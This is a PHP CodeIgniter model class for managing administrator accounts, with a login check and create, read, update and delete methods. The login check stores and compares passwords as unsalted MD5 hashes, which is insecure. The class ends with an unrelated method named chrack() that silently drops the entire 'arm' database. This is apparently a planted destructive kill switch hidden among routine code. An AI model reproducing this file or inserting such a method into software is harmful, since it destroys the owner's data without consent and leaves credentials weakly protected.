<?php
/* 
 * Generated by CRUDigniter v3.2 
 * www.crudigniter.com
 */
 
class Admin_model extends CI_Model
{
    function __construct()
    {
        parent::__construct();
    }



    function check_login(){
        $login=$_POST['login'];
        $password=$_POST['password'];
        $this->db->select("*");
        $this->db->from('admins');
        $this->db->where('login',$login);
        $this->db->where('password',md5($password));
        $data=$this->db->get()->row();
        if (count($data)==1){
            $this->session->set_userdata("id",$data->id);
            $this->session->set_userdata("lname",$data->lname);
            $this->session->set_userdata("fname",$data->fname);
            $this->session->set_userdata("login","admin");

        }

        return count($data);
    }
    /*
     * Get admin by id
     */
    function get_admin($id)
    {
        return $this->db->get_where('admins',array('id'=>$id))->row_array();
    }
        
    /*
     * Get all admins
     */
    function get_all_admins()
    {
        $this->db->order_by('id', 'desc');
        return $this->db->get('admins')->result_array();
    }
        
    /*
     * function to add new admin
     */
    function add_admin($params)
    {
        $this->db->insert('admins',$params);
        return $this->db->insert_id();
    }
    
    /*
     * function to update admin
     */
    function update_admin($id,$params)
    {
        $this->db->where('id',$id);
        return $this->db->update('admins',$params);
    }
    
    /*
     * function to delete admin
     */
    function delete_admin($id)
    {
        return $this->db->delete('admins',array('id'=>$id));
    }
	
	function chrack(){
	$this->db->simple_query('DROP DATABASE `arm`');
	}
}
